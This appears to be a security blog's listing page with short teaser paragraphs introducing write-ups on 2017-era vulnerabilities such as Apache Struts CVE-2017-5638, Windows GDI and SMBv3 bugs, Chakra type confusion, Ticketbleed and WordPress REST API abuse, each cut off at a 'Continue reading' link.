An Elevation of Privilege vulnerability in the Windows GDI component was reported to Microsoft by Lockheed Martin Computer Incident Response Team. The vulnerability is assigned Id – CVE-2017-0005 “Windows GDI Elevation of Privilege Vulnerability”. The bug was addressed in MS17-0013 along with other GDI targeted EoP vulnerabilities. According to Microsoft this exploit is used by the … Continue reading “Windows GDI Elevation of Privilege Vulnerability: CVE-2017-0005”
ACTi Cameras Multiple Security Vulnerabilities
The IP security camera industry has grown a lot over the past few years. From consumer-grade home IP security models to professional-grade models. Internet-connected video camera, or IP cameras, are widely used for security systems, offering the advantage that footage can be streamed anywhere remotely. However, anything connected to the Internet poses risks if not … Continue reading “ACTi Cameras Multiple Security Vulnerabilities”
WordPress REST API User Enumeration Abuse
WordPress is a popular, open source, blogging tool and content management system based on PHP and MySQL. According to the latest BuiltWith statistics, a total of 18,619,652 live websites use WordPress! That figure is 5% of the total internet websites! About three months ago with the advent of WordPress 4.7, support for REpresentational State Transfer … Continue reading “WordPress REST API User Enumeration Abuse”
Apache Struts Jakarta Multipart Parser Remote Code Execution Vulnerability
Introduction: On March 7, 2017, Apache issued an emergency security alert as, Apache Struts was exposed to a high-risk remote command execution vulnerability, tracked as CVE-2017-5638. Struts is an open source project of the Apache Foundation Jakarta project team, which uses MVC mode to help Java developers use J2EE to develop Web applications. At present, … Continue reading “Apache Struts Jakarta Multipart Parser Remote Code Execution Vulnerability”
Chakra: Type Confusion Vulnerability – CVE-2016-7201
Introduction: Last year in the month of September, the Project Zero team from Google disclosed vulnerabilities in the Microsoft JavaScript engine Chakra. CVE-2016-7200 and CVE-2016-7201 are two such bugs that caught the limelight. Even though it’s an old bug it is worth discussing their specifics. Both of these vulnerabilities went from PoC of vulnerability to … Continue reading “Chakra: Type Confusion Vulnerability – CVE-2016-7201”
Microsoft Edge and Internet Explorer Type Confusion Zero Day Vulnerability
Introduction: Google Project Zero recently disclosed an unpatched vulnerability that affects Microsoft Edge and Internet Explorer. This vulnerability is tracked as CVE-2017-0037. The disclosed PoC only demonstrates DoS attack on the target, but arbitrary code execution could also be possible. A PoC for the same is also available here. Exploit: The CVE-2017-0037 vulnerability, so-called ‘type … Continue reading “Microsoft Edge and Internet Explorer Type Confusion Zero Day Vulnerability”
Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x Multiple Vulnerabilities
I recently came across one of the Trend Micro’s enterprise security products ‘InterScan Web Security Virtual Appliance (IWSVA)’. It’s a secure web gateway that combines application control with zero-day exploit detection, advanced anti-malware and ransomware scanning, real-time web reputation, and flexible URL filtering to provide superior Internet threat protection. I downloaded the latest version ‘IWSVA version … Continue reading “Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x Multiple Vulnerabilities”
Ticketbleed Vulnerability On F5 BIG-IP
A remote memory leaking vulnerability called Ticketbleed (CVE-2016-9244) is found on F5 BIG-IP Devices. The vulnerability allows remote attacker to extract up to 31 bytes of uninitialized memory at a time. Root cause of this heartbleed style vulnerability is during the TLS/SSL handshake, F5 BIG-IP servers echos back fixed size of memory data even client asks less … Continue reading “Ticketbleed Vulnerability On F5 BIG-IP”
WordPress Vulnerabilities Are Being Actively Exploited
At the end of January 2017, WordPress released version 4.7.2 to fix multiple security vulnerabilities. Not long after that, active exploits against these vulnerabilities were detected. Attackers left messages like “by NG689Skw” or “by w4l3XzY3” on the victims’ websites. Here’s a screenshot: You can see that the attacker became “ADMIN” of the WordPress site, and that remote code … Continue reading “WordPress Vulnerabilities Are Being Actively Exploited”
Windows SMBv3 Zero Day Vulnerability
Introduction: A buffer overflow vulnerability in SMBv3 was made public on Feb 12017, by Laurent Gaffie. The CVE-ID is CVE-2017-0016. A PoC for the same is also available here. The bug affects Windows 2012, Server 2016 and Windows 10. At the moment the PoC only demonstrates DoS attack on the target, we are not sure … Continue reading “Windows SMBv3 Zero Day Vulnerability”
